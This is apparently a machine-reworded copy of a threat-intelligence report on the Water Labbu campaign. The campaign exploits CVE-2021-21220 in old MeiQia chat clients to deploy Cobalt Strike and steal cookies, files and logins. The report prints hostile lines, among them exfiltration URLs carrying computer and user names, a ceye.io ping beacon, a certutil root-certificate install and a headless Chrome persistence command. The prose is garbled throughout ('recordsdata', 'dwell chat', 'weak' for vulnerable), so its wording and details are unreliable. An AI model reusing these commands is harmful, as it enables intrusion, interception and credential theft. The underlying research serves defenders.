We found that the Cobalt Strike occasion added a persistence registry key to load an exploit file from an internet code repository managed by Water Labbu. The repository hosted a number of exploit recordsdata of CVE-2021-21220 (a Chromium vulnerability affecting variations earlier than 89.0.4389.128) to execute a Cobalt Strike stager. It additionally contained recordsdata designed to focus on Meiqia (美洽), a Chinese language desktop-based dwell chat app for on-line buyer assist that’s used on web sites. MeiQia (美洽) was developed utilizing ElectronJS — a framework that employs Chromium core, and due to this fact is weak to Chromium’s vulnerabilities.
We noticed that many cryptocurrency rip-off web sites that have been compromised on this marketing campaign additionally embedded Meiqia to offer an choice for simple communication with potential victims. This affiliation means that Water Labbu seemingly sends the exploit by way of the dwell chat field. To assist this declare, we discovered an exploit HTML file pattern containing a screenshot that appears like a withdrawal affirmation for cryptocurrency funds. If scammers open the exploit web page in an previous weak model of the Meiqia administration shopper software, it’s potential that they could get contaminated by Water Labbu.
The an infection is initiated when) the preliminary scammer (in essence, the sufferer) opens a weaponized webpage (seemingly despatched to them by way of livechat). A latest analysis paper on Electron safety demonstrated a profitable exploitation of an Electron-based software utilizing CVE-2021-21220. On this situation, it leveraged cross-site scripting (XSS) methods to pressure the exploit to be rendered in a window with out sandboxing.
We discovered weaponized HTML pages created by Water Labbu that leverages the identical Chromium vulnerability to assault the MeiQia software. The preliminary scammers used an previous model of MeiQia, which is perhaps weak to exploits. Assessment of the code exhibits that previous variations of MeiQia open exterior hyperlinks inside their ElectronJS purposes and render the online web page with out sandboxing. The most recent model of MeiQia will not be weak as a result of it runs on the newer model of Chromium core and in addition opens the exterior hyperlinks, not contained in the ElectronJS app, however by way of the default system internet browser.
The weaponized HTML pages include JavaScript that makes use of the Consumer-Agent to establish whether or not the surroundings of the sufferer is weak. The script detects strings corresponding to “electron” and “x64” to find Electron-based purposes and x64 structure. It additionally detects the strings “0.0.8 Chrome/83,” “s/0.0.7,” or “s/0.0.6,” to establish whether it is working inside a weak model of Chromium or MeiQia software. If the Consumer-Agent doesn’t match, it is going to both redirect victims to the official MeiQia web site or create a brand new iframe to load screenshots from banking or cryptocurrency transactions. It’s seemingly that these are the lures Water Labbu used to speak with the focused cryptocurrency rip-off web sites.
When the weaponized HTML pages detect a weak goal, it is going to proceed with loading extra levels of the assault.
The final stage includes the creation and loading of a brand new script referred to as “tongji.js,” which in Chinese language means 痛擊 (to ship a punishing assault). These recordsdata are hosted inside Water Labbu’s code repository. The “tongji.js” script is a JavaScript containing CVE-2021-21220 exploit code, with a shellcode that may be a Cobalt Strike stager. The Metasploit module for this vulnerability is publicly accessible. Water Labbu reuses the accessible code, obfuscates it with a number of layers of obfuscation (sojson.v4, jsjiami.com.v5), earlier than executing the customized shellcode.
The embedded shellcode can both be a Cobalt Strike stager or a fancy batch command able to stealing credentials, and downloading and working different scripts and recordsdata.
Regardless if the embedded shellcode is the stager or the customized batch script, we seen that the set of malicious operations that have been being carried out have been largely the identical:
1) Obtain and set up Cobalt Strike
2) Steal cookies and different vital recordsdata
3) Obtain and patch the MeiQia app
4) Obtain extra spying software program
5) Present details about the an infection progress by speaking with the report-collecting server, amongst others
The Cobalt Stike stager is often encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded right into a Golang shellcode runner to make payload detection tougher. The malware operator was seemingly impressed by this weblog publish.
It makes an attempt to steal *.txt recordsdata in “desktop,” “Telegram Desktop,” and MeiQia cookies in “AppDataRoamingcom.meiqia.windowscookies.” These recordsdata are included in a specifically crafted .html file and submitted to the information-collecting server with the assistance of headless Chrome (with out seen UI) or Web Explorer (if submission with Chrome fails). The specifically crafted .html file comprises one kind, one enter textual content with the pc identify, and one textual content space with stolen content material. After the timeout expires, the script will robotically submit the content material to a typosquatting area.
If Cobalt Strike has not been put in but, then it’s downloaded and executed. The Golang shellcode runner is used as a type of obfuscation.
To study extra in regards to the success or failure of the an infection progress, parameters corresponding to COMPUTERNAME and USERNAME are exfiltrated to the report-collecting server. In case of failure, the server might name the next requests:
- https://<report amassing server>/?a=%COMPUTERNAME%&f=0&consumer=%USERNAME%
- https://<report amassing server>/?b=%COMPUTERNAME%&f=0&consumer=%USERNAME%
- https://<report amassing server>/?z=%COMPUTERNAMEpercentuser=%USERNAMEpercent_fail
If the MeiQia app will not be discovered, the error report with parameter “a” is distributed. If the app is discovered and is unpatched, the error report with parameter “b” is distributed. If the discretionary entry management listing modifications with icacls fails, the error report with parameter “z” is distributed.
In the meantime, one other script checks if the method “360tray” belonging to the 360 Whole Safety answer is working:
- https://<report amassing server>/c/?c=%computername%
- https://<report amassing server>/c/?c=%computernamepercent_no360
In some circumstances, we additionally seen DNS and HTTP monitoring platforms corresponding to ceye.io getting used to gather details about the an infection progress:
- ping %computername%.<distinctive identifier>.ceye.io
- The batch script for downloading and set up MeiQia and Chrome
If essential, this batch script will obtain a weak model of Chrome (89.0.4389.114) and/or an-already patched MeiQia software from a repository discovered on a well-liked model management web site. These recordsdata are downloaded and extracted to the contaminated system.
The script modifies the Run registry key for persistence, with the persistent command being “chrome.exe –headless –no-sandbox –user-data-dir=<path to consumer knowledge dir> <path to CVE-2021-21220 exploit>”. Because the script put in a weak model of Chrome, the following reboot of the working system causes the exploitation of the vulnerability and execution of the embedded shellcode (both Cobalt Strike or a customized one).
This script provides a certificates to Trusted Root by by way of the certutil utility:
- certutil -addstore -f root “%userprofile%<path to certificates>.pem
The script installs a certificates with the filename “mitmproxy-ca-cert.pem” into Trusted Root. Though we don’t have the certificates file, It is seemingly that it’s generated by mitmproxy instrument because of its file identify.
It then modifies the AutoConfigURL setting in “HKCUSoftware programMicrosoftHome windowsCurrentVersionWeb Settings”. These settings enable a consumer to specify sure domains to have their site visitors forwarded via a proxy. With the assistance of a malicious certificates put in within the root listing, an attacker will be capable of decrypt HTTPS encrypted site visitors and steal entered credentials.
The extra scripts carry out the next:
a) Hiding home windows with the title “home windows replace.”
b) Downloading and working osmonitor, a instrument for spying on victims and monitoring their conduct.
c) Patching the MeiQia app, both by downloading an already-patched app0.2.asar archive and changing it, or by working a patcher script
d) Restarting the MeiQia app to begin the patched model
e) Stealing *.txt and *.xl* recordsdata from “Current Information,” steals *.lnk, *.txt, *.xl* recordsdata from “Desktop,” and provides a listing of processes and listing of energetic community connections earlier than packing these into a zipper archive and importing it to an OS information-collecting server
The method of patching MeiQia includes altering recordsdata within the app.asar archive. In our situation, the “.modulescreate-window.js” file from the app.asar archive was modified. The modifications included:
a) Disabling auto updates
b) Setting mounted window sizes
c) Changing the default URL (https://app.meiqia.com) with a malicious one
d) Embedding extra JavaScript recordsdata to be executed inside the MeiQia software context
When victims open a brand new MeiQia window, the script injected to the inner perform “new-window” will examine the title of the online web page. If the title doesn’t include the string “美洽” (MeiQia), it is going to redirect victims to the official MeiQia web site and execute extra JavaScript recordsdata inside the web page.
Throughout our analysis, we found that lots of the hyperlinks used for loading extra scripts have been not energetic. Nevertheless, one of many hyperlinks loading a script referred to as “apo.js” (阿婆 = mother-in-law) from their code repository was nonetheless accessible.
If the title comprises the Chinese language string “登录” (dēng lù = login), the script will attempt to seize the worth of DOM components with the IDs “electronic mail” and “password” and ship the grabbed knowledge to the distant server “app[.]meiqiacontents[.]com”. If the title comprises the Chinese language phrase “美” (Mei), it is going to gather the web site’s cookies and ship them to the identical distant server.
When victims open a brand new window with out specifying any URL to load, the brand new window will load the default URL of the appliance (APP_URL), which has additionally been changed with a malicious URL hosted on the supply server “mmmm[.]whg7[.]cc”. The supply server will solely reply when the Consumer-Agent comprises the string “Electron” to make sure that it’s despatched from an Electron software.
The request to the malicious URL responds with a code that redirects to the MeiQia app’s authentic default URL. On the similar time, it creates a small new window to load one other URL that can carry out a number of redirections earlier than lastly trying to use CVE-2021-21220 to launch a Cobalt Strike stager.
Water Labbu registered the typosquatting area identify meiqla.com (in comparison with the legit meiqia.com). Though the web site seems visually similar to the legit one, there’s one noteworthy malicious characteristic.
Determine 14 exhibits how the perform lc() reads the user-entered electronic mail and password and exfiltrates them to an information-recording PHP script earlier than redirecting victims to the legit meiqia.com web site.
Water Labbu is a harmful new menace actor with a fancy routine and infrastructure that isn’t afraid to leverage the schemes of different scammers for its personal ends, exploiting dwell chat purposes on preexisting rip-off web sites that have been developed utilizing the ElectronJS framework.
A key a part of the menace actor’s routine is the exploitation of a recognized Chromium vulnerability to focus on scammers who use an unpatched model of the MeiQia app. On condition that customers are dealing not solely with the unique scammer, however with Water Labbu as nicely, we advise each people and organizations to replace their purposes and programs to the most recent safe variations to forestall weak software program from being exploited and utilized in malicious methods.
Learn the primary a part of our Water Labbu sequence to study extra about how the menace actor compromises Dapps for their very own functions.
The indications of compromise for this weblog entry might be discovered right here.
